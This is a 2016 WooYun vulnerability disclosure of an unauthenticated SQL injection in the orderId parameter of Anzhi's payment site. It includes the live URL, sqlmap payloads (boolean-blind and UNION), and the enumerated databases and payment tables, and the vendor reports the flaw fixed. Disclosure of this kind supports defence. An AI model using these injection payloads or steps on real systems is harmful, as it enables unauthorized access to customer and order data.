当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189833

漏洞标题:安智网核心业务SQL注入(涉及400多万订单信息)

相关厂商:安智网

漏洞作者: 风之传说

提交时间:2016-03-28 09:27

修复时间:2016-04-05 09:44

公开时间:2016-04-05 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

安智(北京力天无限网络技术有限公司)成立于2010年2月,2011年6月获得盛大网络千万级投资。2010年5月安智论坛上线,6月推出了第一版的安智市场客户端,沿袭了先论坛,后市场的发展模式,每一步都走的驾轻就熟。截止到今天,安智已成为目前中国最知名的Android系统手机应用软件下载平台,也是用户数量最先破千万的国内第三方应用市场。
看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入比较少,于是就尝试下寻找寻找。然后冲了1块钱就找到了。

详细说明:

安智网核心业务sql注入(涉及400多万订单信息和所有会员信息。)

漏洞证明:

看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入漏洞比较少,于是就尝试下寻找寻找。然后冲了1块钱就被我找到了。看来一块钱的作用还是很大的。
不需要登录即可注入。
直接出给注入地址。pay订单页面,字符型核心注入:
http://pay.anzhi.com/web/recharge-result?orderId=16032722261270000022

[22:35:53] [INFO] GET parameter 'orderId' is 'MySQL UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] n
sqlmap identified the following injection points with a total of 71 HTTP(s) requ
ests:
---
Place: GET
Parameter: orderId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderId=16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: orderId=-3609' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x61784e617a424d615077,0x
71707a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#


available databases [17]:
[*] accesslog
[*] adunion
[*] adunion_admin
[*] adunion_stat
[*] anzhipay
[*] anzhipay_history
[*] information_schema
[*] keta_custom
[*] mysql
[*] pay
[*] pay_activities
[*] pay_check_bill
[*] performance_schema
[*] quartz
[*] sdk_message
[*] test
[*] ucenter


pay数据库
Database: pay
[156 tables]
+----------------------------------+
| check_money_20140106 |
| check_money_20140106_pay |
| dim_cp_tax |
| dim_cp_tax_temp2_20130905 |
| dim_cp_tax_temp_20130905 |
| fct_pay_order |
| fct_pay_order2 |
| fct_pay_order_tmp |
| fct_pay_tenpay_order |
| m_activities_user |
| m_activities_user_exist |
| m_app_payment_type |
| m_app_payment_type_20140825 |
| m_app_payment_type_copy |
| m_app_paytypes |
| m_app_paytypes_20140718 |
| m_app_paytypes_20140724 |
| m_p_app_sms_suport |
| m_pay_app_callback |
| m_pay_count_0 |
| m_pay_count_1 |
| m_pay_count_10 |
| m_pay_count_11 |
| m_pay_count_12 |
| m_pay_count_13 |
| m_pay_count_14 |
| m_pay_count_15 |
| m_pay_count_16 |
| m_pay_count_17 |
| m_pay_count_18 |
| m_pay_count_19 |
| m_pay_count_2 |
| m_pay_count_3 |
| m_pay_count_4 |
| m_pay_count_5 |
| m_pay_count_6 |
| m_pay_count_7 |
| m_pay_count_8 |
| m_pay_count_9 |
| m_pay_inf_manage |
| m_pay_paytype |
| m_pay_recharge |
| m_pay_recharge_type___ |
| m_pay_subchannel |
| m_pay_user_limit_quota |
| m_pay_user_limit_quota_back |
| m_rebate_wealth |
| m_rebate_wealth_20141224 |
| m_sms_config |
| m_user_20150317 |
| m_user_reward_wealth |
| m_user_reward_wealth_20141127 |
| m_user_reward_wealth_bak |
| m_user_reward_wealth_his |
| mid_cp_rate |
| mid_month_money |
| mid_order_id |
| mid_p_app_type |
| mid_p_app_type1 |
| mid_p_app_type_bad |
| mid_p_pay_app_month_revenue |
| mid_p_pay_order_hour |
| mid_p_pay_order_hour1 |
| mid_p_pay_settlement |
| mid_pay_order1 |
| mid_pay_order2 |
| p_activities_res |
| p_activities_res_20150225 |
| p_app_category |
| p_app_channel |
| p_app_gametype |
| p_app_inf_rate |
| p_app_info |
| p_app_info_20140616 |
| p_app_info_20151207 |
| p_app_info_day |
| p_app_rate |
| p_app_rate_step |
| p_app_sms |
| p_app_tax |
| p_dev_user_manage |
| p_dev_user_manage_20150625 |
| p_order_ing |
| p_pay_app_month_revenue |
| p_pay_app_month_revenue_20131113 |
| p_pay_app_month_revenue_20140612 |
| p_pay_app_month_revenue_20150624 |
| p_pay_channel_order_rec |
| p_pay_device |
| p_pay_filter_testaccount |
| p_pay_filter_testuser |
| p_pay_inf_manage |
| p_pay_order |
| p_pay_order_1 |
| p_pay_order_15042917391270000002 |
| p_pay_order_2 |
| p_pay_order_201404 |
| p_pay_order_20150415 |
| p_pay_order_3 |
| p_pay_order_4 |
| p_pay_order_5 |
| p_pay_order_6 |
| p_pay_order_7 |
| p_pay_order_8 |
| p_pay_order_9 |
| p_pay_order_history_121229145631 |
| p_pay_order_mid |
| p_pay_order_tmp_0814 |
| p_pay_repeat_tips |
| p_pay_rules |
| p_pay_sdk_update_mgr |
| p_pay_sdk_upgrade_rec |
| p_pay_settlement |
| p_pay_settlement_20131113 |
| p_pay_sms_app |
| p_pay_sms_good |
| p_pay_tenpay_app_month |
| p_pay_tenpay_order |
| p_pay_tenpay_order_count |
| p_pay_tenpay_settlement |
| p_pay_type |
| p_pay_upload_appkey_log |
| p_pay_user_app |
| p_recharge_pro |
| p_recharge_pro_history |
| run_log_err |
| t_activities_1413 |
| t_auth_user |
| t_auth_user_new |
| t_auth_user_new_ |
| t_menu |
| t_menu_20140826 |
| t_menu_new |
| t_operation_permission |
| t_role_menu |
| t_role_menu_new |
| t_role_operation |
| t_roles |
| t_roles_new |
| t_user_roles |
| t_user_roles_new |
| task_list |
| task_list_app_name |
| task_log |
| task_log_20140811 |
| tmp_error_user |
| tmp_order_id |
| tmp_total_m |
| tmp_user_abz |
| tmp_user_consume |
| tmp_user_m2azb |
| tmp_user_pay |
| tmp_user_red |
| tmp_user_status |
| zfb_order |
| zfb_ording |
+----------------------------------+


然后看看有多少订单:

10.png


480万差不多500万了。
sql注入就应该言简意赅。恩,就是这样。

修复方案:

sql注入,你们应该会修复的。

版权声明:转载请注明来源 风之传说@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-29 13:55

厂商回复:

感谢,马上进行修复。

最新状态:

2016-04-05:已修复。